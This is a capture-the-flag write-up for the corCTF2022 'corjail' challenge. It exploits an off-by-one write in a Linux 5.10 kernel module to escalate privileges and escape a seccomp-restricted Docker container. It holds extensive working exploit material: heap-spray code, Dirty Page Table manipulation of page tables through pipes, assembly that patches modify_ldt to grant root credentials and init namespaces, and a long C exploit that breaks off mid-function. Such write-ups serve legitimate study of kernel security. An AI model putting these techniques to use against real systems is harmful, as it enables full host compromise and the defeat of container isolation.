corCTF2022 corjail
Table of Contents
Problem⌗
Environment⌗
- linux version:
5.10.127- CONFIG_SLUB_DEBUG=y
- CONFIG_SLUB=y
- CONFIG_SLAB_FREELIST_RANDOM=y
- CONFIG_SLAB_FREELIST_HARDENED=y
Simple description⌗
The goal of this challenge is escaping docker with seccomp-ed environment by using off-by-one in kmalloc-4k.
The seccomp prohibits us to use struct msg_msg and struct msg_msgseg.
So, we need to find new structure which makes us exploit off-by-one. And after making RIP control (ROP, or something…), we have to LPE and Escaping docker.
Module⌗
The module is simple: just prints the count of each syscall called and makes us to filter which syscall’s call count will be counted.
It utilizes Syscall statistics patch based on https://lwn.net/Articles/896474/ (check out build/build_kernel.sh).
I think this function is only one we must read:
int64_t cormon_proc_write(struct file *file, const char *src, size_t size,
loff_t *ppos) {
size_t v5; // rbp
const char *v7; // rbx
if (*ppos < 0) return -22LL;
if (size == 0 || (unsigned __int64)*ppos > 0xFFF) return 0LL;
if (size > 0x1000)
v5 = 4095LL;
else
v5 = size;
v7 = (const char *)kmem_cache_alloc_trace(
kmalloc_caches[12], 2592LL,
4096LL); // SLAB_CACHE = kmalloc-4096 (0x800 < size <= 0x1000)
printk(&unk_578, v7);
if (v7) {
_check_object_size(v7, v5, 0LL);
if (copy_from_user(v7, src, v5)) {
printk(&unk_5D0, src);
return -14LL;
} else {
v7[v5] = 0; // off-by-one when size=0x1000 -> v5=0x1000
if ((unsigned int)update_filter(v7)) {
kfree(v7);
return -22LL;
} else {
kfree(v7);
return size;
}
}
} else {
printk(&unk_5A0, 0LL);
return -12LL;
}
}Vulnerability⌗
As I wrote on above pseudocode, the vulnerability (off-by-one) is occurs at v7[v5] = 0;.
Okay.. the off-by-one in kmalloc-4k is all of this challenge…
Exploit⌗
Haha… okay… how we can exploit off-by-one in kmalloc-4k without struct msg_msg…?
I tried 3 approaches and I solve it with last approach as a result (I think first one was too complex and second one does not works..).
First approach (using struct poll_list)⌗
Finding victim object⌗
My first approach is exploit structure with first member is struct ??? *next or refcount like atomic_t ???_count, atomic_long_t ???_count, or etc.
If the structure has next pointer, we can make UAF by releaseing the object and this is also same if it has recount.
So I try finding these objects using CodeQL.
import cpp
from Field f, Type ty, PointerType p, FunctionCall call
where
(
call.getTarget().getName() = "kmalloc" or
call.getTarget().getName() = "kzalloc"
) and
call.getActualType() = p and
p.refersTo(ty) and
f.getByteOffset() = 0 and
f.getDeclaringType() = ty and
(
f.getType().getName() = "list_head" or
f.getName().matches("%count%") or
f.getType().refersToDirectly(ty)
) and
(
(
call.getArgument(0).getValue().toInt() > 2048 and
call.getArgument(0).getValue().toInt() <= 4096
) or
not call.getArgument(0).isConstant()
)
select ty.getName(),
ty.getLocation().toString(),
call.getLocation().toString()And the result is following:
| col0 | col1 | col2 |
+-------------------------+---------------------------------------------------------+-----------------------------------------------------+
| workqueue_struct | kernel/workqueue.c:239:8:239:23 | kernel/workqueue.c:4288:7:4288:13 |
| posix_acl | include/linux/posix_acl.h:27:8:27:16 | fs/posix_acl.c:181:26:181:32 |
| msg_msg | include/linux/msg.h:9:8:9:14 | ipc/msgutil.c:53:8:53:14 |
| sem_undo | ipc/sem.c:146:8:146:15 | ipc/sem.c:1940:8:1940:14 |
| list_head | include/linux/types.h:178:8:178:16 | fs/dcookies.c:236:22:236:28 |
| list_head | tools/include/linux/types.h:69:8:69:16 | fs/dcookies.c:236:22:236:28 |
| perf_buffer | kernel/events/internal.h:13:8:13:18 | kernel/events/ring_buffer.c:815:7:815:13 |
| vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:271:16:271:22 |
| vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:308:14:308:20 |
| vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:352:15:352:21 |
| vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/vmbus_drv.c:2473:12:2473:18 |
| blk_plug_cb | include/linux/blkdev.h:1262:8:1262:18 | block/blk-core.c:1743:7:1743:13 |
| audit_tree | kernel/audit_tree.c:13:8:13:17 | kernel/audit_tree.c:97:9:97:15 |
| apertures_struct | include/linux/fb.h:495:9:495:24 | include/linux/fb.h:509:6:509:12 |
| Scsi_Host | include/scsi/scsi_host.h:524:8:524:16 | drivers/scsi/hosts.c:386:10:386:16 |
| neighbour | include/net/neighbour.h:134:8:134:16 | net/core/neighbour.c:453:13:453:19 |
| neighbour | include/net/neighbour.h:134:8:134:16 | net/core/neighbour.c:406:6:406:12 |
| netdev_hw_addr | include/linux/netdevice.h:209:8:209:21 | net/core/dev_addr_lists.c:30:7:30:13 |
| cpu_rmap | include/linux/cpu_rmap.h:24:8:24:15 | lib/cpu_rmap.c:39:9:39:15 |
| poll_list | fs/select.c:839:8:839:16 | fs/select.c:1005:23:1005:29 |
| hpets | drivers/char/hpet.c:104:8:104:12 | drivers/char/hpet.c:858:10:858:16 |
| resource_entry | include/linux/resource_ext.h:23:8:23:21 | kernel/resource.c:1701:10:1701:16 |
| journal_replay | drivers/md/bcache/journal.h:83:8:83:21 | drivers/md/bcache/journal.c:150:8:150:14 |
| md_rdev | drivers/md/md.h:48:8:48:14 | drivers/md/raid0.c:149:18:149:24 |
| hv_dr_state | drivers/pci/controller/pci-hyperv.c:517:8:517:18 | drivers/pci/controller/pci-hyperv.c:2266:7:2266:13 |
| hv_dr_state | drivers/pci/controller/pci-hyperv.c:517:8:517:18 | drivers/pci/controller/pci-hyperv.c:2231:7:2231:13 |
| iscsi_bus_flash_conn | include/scsi/scsi_transport_iscsi.h:318:8:318:27 | drivers/scsi/scsi_transport_iscsi.c:1286:15:1286:21 |
| iscsi_bus_flash_session | include/scsi/scsi_transport_iscsi.h:363:8:363:30 | drivers/scsi/scsi_transport_iscsi.c:1237:15:1237:21 |
| iscsi_cls_conn | include/scsi/scsi_transport_iscsi.h:202:8:202:21 | drivers/scsi/scsi_transport_iscsi.c:2401:9:2401:15 |
| iscsi_cls_session | include/scsi/scsi_transport_iscsi.h:241:8:241:24 | drivers/scsi/scsi_transport_iscsi.c:2040:12:2040:18 |
| tcmu_tmr | drivers/target/target_core_user.c:192:8:192:15 | drivers/target/target_core_user.c:1270:8:1270:14 |
| ext4_xattr_inode_array | fs/ext4/xattr.h:119:8:119:29 | fs/ext4/xattr.c:2822:15:2822:21 |
| fscache_cache_tag | include/linux/fscache-cache.h:43:8:43:24 | fs/fscache/cache.c:41:9:41:15 |
| mr_table | include/linux/mroute_base.h:241:8:241:15 | net/ipv4/ipmr_base.c:41:8:41:14 |
| pneigh_entry | include/net/neighbour.h:171:8:171:19 | net/core/neighbour.c:1714:23:1714:29 |
| pneigh_entry | include/net/neighbour.h:171:8:171:19 | net/core/neighbour.c:737:6:737:12 |
| fib_rule | include/net/fib_rules.h:20:8:20:15 | net/core/fib_rules.c:544:11:544:17 |
| fib_rule | include/net/fib_rules.h:20:8:20:15 | net/core/fib_rules.c:60:6:60:12 |
| msg_msgseg | ipc/msgutil.c:37:8:37:17 | ipc/msgutil.c:68:9:68:15 |
| audit_chunk | kernel/audit_tree.c:25:8:25:18 | kernel/audit_tree.c:193:10:193:16 |
| kprobe_insn_page | kernel/kprobes.c:90:8:90:23 | kernel/kprobes.c:172:8:172:14 |
| kmalloced_param | kernel/params.c:39:8:39:22 | kernel/params.c:50:6:50:12 |
| nested_table | lib/rhashtable.c:32:7:32:18 | lib/rhashtable.c:133:9:133:15 |
| nf_queue_entry | include/net/netfilter/nf_queue.h:12:8:12:21 | net/netfilter/nf_queue.c:204:10:204:16 |
| tls_rec | include/net/tls.h:99:8:99:14 | net/tls/tls_sw.c:337:8:337:14 |
| nh_group | include/net/nexthop.h:75:8:75:15 | net/ipv4/nexthop.c:138:8:138:14 |
| ctnl_timeout | include/net/netfilter/nf_conntrack_timeout.h:20:8:20:19 | net/netfilter/nfnetlink_cttimeout.c:133:12:133:18 |
| recent_entry | net/netfilter/xt_recent.c:66:8:66:19 | net/netfilter/xt_recent.c:191:6:191:12 |
| counted_str | security/apparmor/include/lib.h:93:8:93:18 | security/apparmor/lib.c:139:8:139:14 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:1404:9:1406:38 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:813:9:816:23 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:825:9:829:23 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/label.c:428:8:428:14 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:1117:8:1119:37 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:895:9:897:25 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/mount.c:707:11:709:27 |
| aa_buffer | security/apparmor/lsm.c:47:7:47:15 | security/apparmor/lsm.c:1691:12:1691:18 |
| aa_buffer | security/apparmor/lsm.c:47:7:47:15 | security/apparmor/lsm.c:1611:11:1611:17 |
| ima_rule_opt_list | security/integrity/ima/ima_policy.c:63:8:63:24 | security/integrity/ima/ima_policy.c:288:13:288:19 |I look up these structures and struct poll_list is useful.
Because it has struct poll_list *next at offset 0, it is allocated by poll system call, and its size is provided by user.
How to spray poll?⌗
I want to spray struct poll_list in kmalloc-4k. Therefore I can allocate it and release it when I want.
But since the poll originally block the user program, we allocate it on other thread (actually we need to allocate it on other process).
I tried it using pthread_create but the thread is not created. So I decide to use clone
int create_poll(void *timeout_ms) {
pin_to_core(0);
const int timeout = (int)(int64_t)timeout_ms;
const int size = (256 - 16) / 8 + (0x1000 - 16) / 8;
struct pollfd *fds = malloc(size * sizeof(struct pollfd));
for (int i = 0; i < size; i++) {
fds[i].fd = 0xdead0000 + i;
fds[i].events = POLLIN;
}
poll(fds, size, timeout);
free(fds);
}
#define CLONE_STACK_HEAP_ALLOC_COUNT 1024 * 1024
int create_poll_via_clone(int timeout_ms) {
char child_stack[CLONE_STACK_HEAP_ALLOC_COUNT];
int pid = clone(create_poll, child_stack, CLONE_VM | SIGCHLD,
(void *)(int64_t)timeout_ms);
return pid;
}SLUBStick⌗
Now I can spray struct poll_list and trigger off-by-one.
But as you know, we cannot ensure off-by-one will corrupt struct poll_list’s struct poll_list *next.
I decide to use SLUBStick for gathering struct poll_lists in one (or consecutive) slab cache.
Originally SLUBStic is for a cross-cache attack and cross-cache attack requires that target objects must be in one slab cache.
By using SLUBStick we can spray struct poll_lists on one (or consecutive) slab cache.
And so off-by-one will be corrupt its next with high stability.
Find another approace⌗
At this time, I think how I can exploit using struct poll_list.
My plain was following:
- Spray
struct poll_listwith its next is in kmalloc-8, kmalloc-16, kmalloc-32, kmalloc-64, kmalloc-128, kmalloc-192 (let me call it target cache from now on) - Trigger off-by-one and make UAF in target cache
- Leak kernel base to bypass KASLR using object in target cache
- Do Cross-Cache attack on target cache and make UAF in kmalloc-1k (for using
struct tty_struct) - Do ROP using
struct user_key_payloador other objects
Hmm… This require cross-cache attack and its stability is low as we know. That’s why I try another approach.
PS. the author’s write-up might do similar thing without cross-cache. Leak address of struct tty_struct using struct tty_file_private and make UAF on that struct tty_struct. And do ROP.
Second approach (using PageJack)⌗
After searching methods which can exploit off-by-one, I found PageJack. It does not require bypass KASLR, corss-cache, and ETC and only require the off-by-one (or OOB write).
WoW.. I tried it immediately…. But it does not works…. WHY?!?!
Why PageJack does not work?⌗
PageJack utilize struct page *page of struct pipe_buffer.
With off-by-one (or OOB write) we can overwrite least significant byte of page and make physical page level UAF as a result.
After page level UAF, spraying struct file will make the UAF page filp cache (the filp cache uses only one page).
The struct files allocated on new filp cache (it’s UAF page) and we have write primitive on it via pipe.
We can modify fmode_t f_mode of struct file via pipe as a result.
Everything is okay except the const struct file_operations *f_op.
The write process is following:
flowchart TD sys_write[sys_write] --> ksys_write ksys_write[ksys_write] --> vfs_write vfs_write[vfs_write] --> write[file->f_op->write] vfs_write[vfs_write] --> new_sync_write[new_sync_write] new_sync_write[new_sync_write] --> write_iter[file->f_op->write_iter] click sys_write "https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L667" click ksys_write "https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L647" click vfs_write "https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L585" click new_sync_write "https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L507" click call_write_iter "https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L1900"
Unlike host environment, in docker container f_op is ovl_file_operations.
So, when call file->f_op->write or file->f_op->write_iter, the called function is not same as host and the f_mode is checked again in ovl_write_iter (check it yourself!).
PS. the pew challenge of CodeGate 2025 Qual is solved easily by PageJack PoC (we need to modify the poc very very little).
Last approach (using struct pipe_buffer and Dirty Page Table)⌗
We cannot use PageJack but we can get physical page level UAF by using it partially. So, then, we can use Dirty Page Table.
UAF page to PTE page⌗
We can spray PTEs via mmap and cause page fault by write to each memory. But I tried like below I failed to allocate PTEs on UAF page.
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
mmap_addrs[i] = mmap((void *)(MMAP_SPRAT_START_ADDR + i * MMAP_SPRAT_STEP),
MMAP_SPRAT_SIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_SHARED, -1, 0);
if (mmap_addrs[i] == MAP_FAILED) {
fatal("mmap");
}
}
sched_yield();
close_pipe_at(victim_pipe_fds[1]); // Make UAF page
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
for (int j = 0; j < MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) {
uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j);
const uint64_t val = ((uint64_t)i << 32) + j * 0x01010101;
*addr = val;
}
}
Why this does not work..?? I don’t know but the below code works…
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
mmap_addrs[i] = mmap((void *)(MMAP_SPRAT_START_ADDR + i * MMAP_SPRAT_STEP),
MMAP_SPRAT_SIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_SHARED, -1, 0);
if (mmap_addrs[i] == MAP_FAILED) {
fatal("mmap");
}
}
sched_yield();
close_pipe_at(victim_pipe_fds[1]); // Make UAF page
for (int i = 0; i < FILE_SPRAY_COUNT; ++i) {
file_fds[i] = open("/", O_RDONLY);
if (file_fds[i] < 0) {
fatal("open");
}
}
for (int i = 0; i < FILE_SPRAY_COUNT; ++i) {
close(file_fds[i]);
}
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
for (int j = 0; j < MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) {
uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j);
const uint64_t val = ((uint64_t)i << 32) + j * 0x01010101;
*addr = val;
}
}
Any way using above code, we can modify PTEs for mmaped memory via pipe.
Leak physical kernel base⌗
Each PTE has its own flags and PFN(Page Frame Number; it’s just <physical address> >> 12).
And thus we can arbitrary read and write physical memory with modified PTE.
So our approach is patch kernel code to escape docker and We need to know physical kernel base address for that.
The linux loads kernel at different physical memory.
But there is a way to leak it: dmabuf at PA:0x9c000 (I don’t know what is it and why there is it..).
The physical kernel base will be *( *(uint64_t*)(PA:0x9c000)&(~0xfff) - 0x2004000ULL).
PS. If KASLR is disabled, physical kernel base will be *( *(uint64_t*)(PA:0x9c000)&(~0xfff) - 0x2001000ULL).
Patch sys_modify_ldt⌗
Now we can patch kernel’s code. So I patch modify_ldt syscall and call it.
The patched modify_ldt will be follwoing:
// Compiled using https://defuse.ca/online-x86-assembler.htm
// We need `endbr64` if CFI is enabled (check out https://en.wikipedia.org/wiki/Control-flow_integrity and https://en.wikipedia.org/wiki/Indirect_branch_tracking)
call get_rip;
get_rip:
pop r15;
sub r15, 0x252f0; // &__x64_sys_modify_ldt - kbase == 0x252f0
sub r15, 5; // call get_rip; takes 5 bytes
// call commit_creds(&init_cred);
lea rdi, [r15 + 0x145a960]; // &init_cred - kbase == 0x145a960
lea rax, [r15 + 0xeba40]; // &commit_creds - kbase == 0xeba40
call rax;
// task = find_task_by_vpid(1);
// call switch_task_namespaces(task, &init_nsproxy);
mov rdi, 1;
lea rax, [r15 + 0xe4fc0]; // &find_task_by_vpid - kbase == 0xe4fc0
call rax; // find_task_by_vpid(1)
mov rdi, rax; // task
lea rsi, [r15 + 0x145a720]; // &init_nsproxy - kbase == 0x145a720
lea rax, [r15 + 0xea4e0]; // &switch_task_namespaces - kbase == 0xea4e0
call rax; // switch_task_namespaces(task, &init_nsproxy);
// current = find_task_by_vpid(pid);
// current->fs = copy_fs_struct(&init_fs);
lea rdi, [r15 + 0x1589740]; // &init_fs - kbase == 0x1589740
lea rax, [r15 + 0x2e7350]; // ©_fs_struct - kbase == 0x2e7350
call rax; // copy_fs_struct(&init_fs);
mov rbx, rax; // new_fs
mov rdi, 0x1111111111111111; // pid: will be fiexed
lea rax, [r15 + 0xe4fc0]; // &find_task_by_vpid - kbase == 0xe4fc0
call rax; // current = find_task_by_vpid(pid)
mov [rax + 0x6e0], rbx; // current->fs = new_fs
// bypass kpti
xor rax, rax;
mov [rsp + 0x00], rax;
mov [rsp + 0x08], rax;
mov rax, 0x2222222222222222; // user_ip: will be fixed
mov [rsp + 0x10], rax;
mov rax, 0x3333333333333333; // user_cs: will be fixed
mov [rsp + 0x18], rax;
mov rax, 0x4444444444444444; // user_rflags: will be fixed
mov [rsp + 0x20], rax;
mov rax, 0x5555555555555555; // user_sp: will be fixed
mov [rsp + 0x28], rax;
mov rax, 0x6666666666666666; // user_ss: will be fixed
mov [rsp + 0x30], rax;
lea rax, [r15 + 0xc00f06]; // bypass_kpti - kbase == 0xc00f06; bypass_kpti is in swapgs_restore_regs_and_return_to_usermode
jmp rax; // bypass_kptiExploit code⌗
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/keyctl.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <syscall.h>
#include <unistd.h>
#define KERNEL_BASE_START 0xffffffff81000000
#define KERNEL_BASE_END 0xffffffffc0000000
#define KERNEL_BASE_MASK (~0x00000000000fffff)
#define IS_IN_KERNEL_RANGE(addr) \
((addr) >= KERNEL_BASE_START && (addr) < KERNEL_BASE_END)
#define _PAGE_PRESENT (1ULL << 0) // Page is present in memory
#define _PAGE_RW (1ULL << 1) // Read/Write permission (1: writable)
#define _PAGE_USER (1ULL << 2) // User/Supervisor mode (1: user-accessible)
#define _PAGE_PWT (1ULL << 3) // Page Write-Through (1: write-through enabled)
#define _PAGE_PCD (1ULL << 4) // Page Cache Disable (1: caching disabled)
#define _PAGE_ACCESSED (1ULL << 5) // Accessed bit (1: page has been accessed)
#define _PAGE_DIRTY (1ULL << 6) // Dirty bit (1: page has been modified)
#define _PAGE_PSE \
(1ULL << 7) // Page Size Extension (1: 2MB/1GB page, 0: 4KB page)
#define _PAGE_GLOBAL \
(1ULL << 8) // Global page (1: remains in TLB across context switches)
#define _PAGE_NX (1ULL << 63) // No-Execute bit (1: execution is prohibited)
#define PTE_FLAGS_MASK \
0xFFF0000000000FFFULL // Mask to extract the lower 12-bit flag field
#define PTE_PFN_MASK \
(~PTE_FLAGS_MASK) // Mask to extract the PFN (Page Frame Number)
// Macro to extract the PFN from a PTE
#define PTE_TO_PFN(pte) (((pte) & PTE_PFN_MASK) >> PAGE_SHIFT)
#define PAGE_DEFAULT_FLAGS \
(_PAGE_PRESENT | _PAGE_RW | _PAGE_USER | _PAGE_ACCESSED)
// Cache utils from https://github.com/isec-tugraz/SLUBStick
#ifndef HIDEMINMAX
#define MAX(X, Y) (((X) > (Y)) ? (X) : (Y))
#define MIN(X, Y) (((X) < (Y)) ? (X) : (Y))
#endif
static size_t rdtsc(void);
static inline size_t rdtsc_nofence(void) {
return rdtsc();
size_t a, d;
asm volatile("rdtsc" : "=a"(a), "=d"(d));
a = (d << 32) | a;
return a;
}
static inline size_t rdtsc(void) {
size_t a, d;
asm volatile("mfence");
asm volatile("rdtsc" : "=a"(a), "=d"(d));
a = (d << 32) | a;
asm volatile("mfence");
return a;
}
static inline size_t rdtsc_begin(void) {
size_t a, d;
asm volatile("mfence");
asm volatile("rdtsc" : "=a"(a), "=d"(d));
a = (d << 32) | a;
asm volatile("lfence");
return a;
}
static inline size_t rdtsc_end(void) {
size_t a, d;
asm volatile("lfence");
asm volatile("rdtsc" : "=a"(a), "=d"(d));
a = (d << 32) | a;
asm volatile("mfence");
return a;
}
void pin_to_core(size_t core);
static void get_enter_to_continue(const char *msg);
static void fatal(const char *msg);
void pin_to_core(size_t core) {
cpu_set_t target_cpu;
CPU_ZERO(&target_cpu);
CPU_SET(core, &target_cpu);
if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
fatal("sched_setaffinity");
}
}
static void get_enter_to_continue(const char *msg) {
puts(msg);
getchar();
}
static void fatal(const char *msg) {
perror(msg);
// get_enter_to_continue("Press enter to exit...");
exit(-1);
}
/**
* type must be "keyring", "user", "logon", or "big_key"
*/
static int32_t sys_add_key(const char *type, const char *desc,
const void *payload, size_t plen, int ringid);
static int32_t sys_keyctl(int cmd, ...);
static int32_t sys_revoke_key(int32_t key);
static int32_t sys_update_key(int32_t key, void *payload, size_t size);
static int32_t sys_read_key(int32_t key, char *buf, size_t size);
static int32_t sys_add_key(const char *type, const char *desc,
const void *payload, size_t plen, int ringid) {
return syscall(__NR_add_key, type, desc, payload, plen, ringid);
}
static int32_t sys_keyctl(int cmd, ...) {
va_list ap;
long arg2, arg3, arg4, arg5;
va_start(ap, cmd);
arg2 = va_arg(ap, long);
arg3 = va_arg(ap, long);
arg4 = va_arg(ap, long);
arg5 = va_arg(ap, long);
va_end(ap);
return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5);
}
static int32_t sys_revoke_key(int32_t key) {
return sys_keyctl(KEYCTL_REVOKE, key);
}
static int32_t sys_read_key(int32_t key, char *buf, size_t size) {
return sys_keyctl(KEYCTL_READ, key, buf, size);
}
static int32_t sys_update_key(int32_t key, void *payload, size_t size) {
return sys_keyctl(KEYCTL_UPDATE, key, payload, size);
}
int vuln_fd;
static void off_by_one_in_kmalloc_4k(void);
static void off_by_one_in_kmalloc_4k(void) {
char buf[0x1000];
memset(buf, 0, 0x1000);
write(vuln_fd, buf, 0x1000);
}
#define HEAP_ALLOC_COUNT 1000
int pipe_fds[HEAP_ALLOC_COUNT][2];
int alloc_4k_pipe_at(uint64_t idx) {
const size_t pipe_size = 0x1000 * 64;
int *fds = pipe_fds[idx];
int res = pipe(fds);
res |= (fcntl(fds[1], F_SETPIPE_SZ, pipe_size) < 0);
char *uniguri = "UNIGURI@";
const uint64_t pipe_magic = 0xdeadbeef00000000 + idx;
write(fds[1], uniguri, 8);
write(fds[1], &pipe_magic, 8);
return !res ? 0 : -1;
}
void close_pipe_at(size_t idx) {
for (int i = 0; i < 2; ++i) {
if (pipe_fds[idx][i] > 2) {
close(pipe_fds[idx][i]);
pipe_fds[idx][i] = -1;
}
}
}
size_t last_idx_in_slab[HEAP_ALLOC_COUNT];
int pipe_cnt = 0;
int make_kmalloc_4k_slab_full(const int slab_cnt) {
pipe_cnt = 0;
int add_key_res[HEAP_ALLOC_COUNT];
size_t times[HEAP_ALLOC_COUNT] = {
0,
};
const char type[] = "keyring";
char desc[0x1000];
memset(desc, '.', sizeof(desc));
desc[sizeof(desc) - 1] = 0;
size_t last = 0;
memset(last_idx_in_slab, 0, sizeof(last_idx_in_slab));
size_t running = 0;
int finded = 0;
for (int i = 0; i < HEAP_ALLOC_COUNT; ++i) {
sched_yield();
int pipe_res = alloc_4k_pipe_at(i);
const size_t t1 = rdtsc_begin();
sys_add_key(type, desc, NULL, 0, 0);
const size_t t2 = rdtsc_end();
times[i] = t2 - t1;
if (pipe_res < 0) {
break;
}
++pipe_cnt;
if (times[i] > 8000 && (i == 0 || times[i] - times[i - 1] > 1500)) {
if (last == 0) {
last = i;
last_idx_in_slab[running] = i;
++running;
} else if (i - last == 8) {
last = i;
last_idx_in_slab[running] = i;
++running;
} else {
last = 0;
running = 0;
}
if (running == slab_cnt) {
for (int j = 0; j < 8 && (i + j + 1 - last) % 8 != 0; ++j) {
alloc_4k_pipe_at(i + j + 1);
++pipe_cnt;
}
finded = 1;
break;
}
}
}
return finded ? 0 : -1;
}
size_t victim_pipe_fds[2];
int find_overlapped_pipes() {
char buf[0x20];
uint64_t *uint64_buf = (uint64_t *)buf;
for (size_t i = 0; i < pipe_cnt; ++i) {
read(pipe_fds[i][0], buf, 0x10);
int is_ok = (memcmp(buf, "UNIGURI@", 8) == 0 &&
(uint64_buf[1] >> 32) == 0xdeadbeef);
int is_corrupted = (uint64_buf[1] == 0xdeadbeef00000000 + i);
if (is_ok && !is_corrupted) {
victim_pipe_fds[0] = i;
victim_pipe_fds[1] = uint64_buf[1] & 0xffffffff;
return 0;
}
if (!is_ok) {
return -1;
}
}
return -1;
}
int test_overlapped_pipes() {
char tmp[0x100];
memset(tmp, 0, sizeof(tmp));
const char *test_str = "UNIGURI!";
const size_t test_str_len = strlen(test_str);
printf(" [*] Test msg(len=0x%lx): \"%s\"\n", test_str_len, test_str);
write(pipe_fds[victim_pipe_fds[1]][1], tmp, test_str_len);
strncpy(tmp, test_str, sizeof(tmp));
printf(" [*] Write \"%s\" to pipe@%lx\n", tmp, victim_pipe_fds[0]);
write(pipe_fds[victim_pipe_fds[0]][1], tmp, test_str_len);
memset(tmp, 0, sizeof(tmp));
read(pipe_fds[victim_pipe_fds[1]][0], tmp, test_str_len);
printf(" [*] Read \"%s\" from pipe@%lx\n", tmp, victim_pipe_fds[1]);
const int successed = !memcmp(test_str, tmp, test_str_len) ? 0 : -1;
read(pipe_fds[victim_pipe_fds[0]][0], tmp, test_str_len);
return successed;
}
#define MMAP_SPRAY_COUNT 0x1000UL
#define FILE_SPRAY_COUNT (MMAP_SPRAY_COUNT / 0x10)
void *mmap_addrs[MMAP_SPRAY_COUNT];
#define MMAP_SPRAT_START_ADDR 0xcafe0000UL
#define MMAP_PAGE_SIZE 0x1000UL
#define MMAP_SPRAT_STEP 0x10000UL
#define MMAP_SPRAT_SIZE 0x10000UL
void spray_ptes_target_to_victim_pipe_page() {
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
mmap_addrs[i] = mmap((void *)(MMAP_SPRAT_START_ADDR + i * MMAP_SPRAT_STEP),
MMAP_SPRAT_SIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_SHARED, -1, 0);
if (mmap_addrs[i] == MAP_FAILED) {
fatal("mmap");
}
}
int file_fds[FILE_SPRAY_COUNT];
sched_yield();
close_pipe_at(victim_pipe_fds[1]);
for (int i = 0; i < FILE_SPRAY_COUNT; ++i) {
file_fds[i] = open("/", O_RDONLY);
if (file_fds[i] < 0) {
fatal("open");
}
}
for (int i = 0; i < FILE_SPRAY_COUNT; ++i) {
close(file_fds[i]);
}
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
for (int j = 0; j < MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) {
uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j);
const uint64_t val = ((uint64_t)i << 32) + j * 0x01010101;
*addr = val;
}
}
}
void *corrupted_mmap_addr = (void *)-1;
void find_corrupted_mmap_addr() {
if (corrupted_mmap_addr != (void *)-1) {
return;
}
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
for (int j = 0; j < MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) {
uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j);
const uint64_t val = ((uint64_t)i << 32) + j * 0x01010101;
if (*addr != val) {
corrupted_mmap_addr = addr;
return;
}
}
}
}
uint64_t original_ptes[0x1000 / 8];
uint64_t physical_kernel_base;
uint64_t default_pte_for_kernel_code;
void *set_pte(uint64_t new_pte) {
static uint64_t cur_offset = 0;
if (cur_offset >= 0x1000 * 512) {
fatal("set_pte: too many modifications");
}
write(pipe_fds[victim_pipe_fds[0]][1], &new_pte, 8);
if (corrupted_mmap_addr == (void *)-1) {
find_corrupted_mmap_addr();
}
void *affected_addr = corrupted_mmap_addr + cur_offset;
cur_offset += 0x1000;
return affected_addr;
}
uint64_t user_cs, user_ss, user_sp, user_rflags;
static void save_state() {
asm("mov %[u_cs], cs;\n"
"mov %[u_ss], ss;\n"
"mov %[u_sp], rsp;\n"
"pushf;\n"
"pop %[u_rflags];\n"
: [u_cs] "=r"(user_cs), [u_ss] "=r"(user_ss), [u_sp] "=r"(user_sp),
[u_rflags] "=r"(user_rflags)::"memory");
printf(
"[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: "
"0x%lx\n",
user_cs, user_ss, user_sp, user_rflags);
}
#define MODIFY_LDT_ADDR 0xffffffff810252f0
#define MODIFY_LDT_OFFSET (MODIFY_LDT_ADDR - KERNEL_BASE_START)
uint64_t *modify_ldt_addr;
uint8_t original_modify_ldt_code[0x1000];
static void get_shell() {
puts("[+] Escaping docker is success");
puts(" [*] Restore original modify_ldt code");
memcpy(modify_ldt_addr, original_modify_ldt_code,
sizeof(original_modify_ldt_code) - (MODIFY_LDT_OFFSET & 0xfff));
puts("[+] Get shell!");
char *argv[] = {"/bin/bash", NULL};
char *envp[] = {NULL};
execve("/bin/bash", argv, envp);
}
void patch_modify_ldt() {
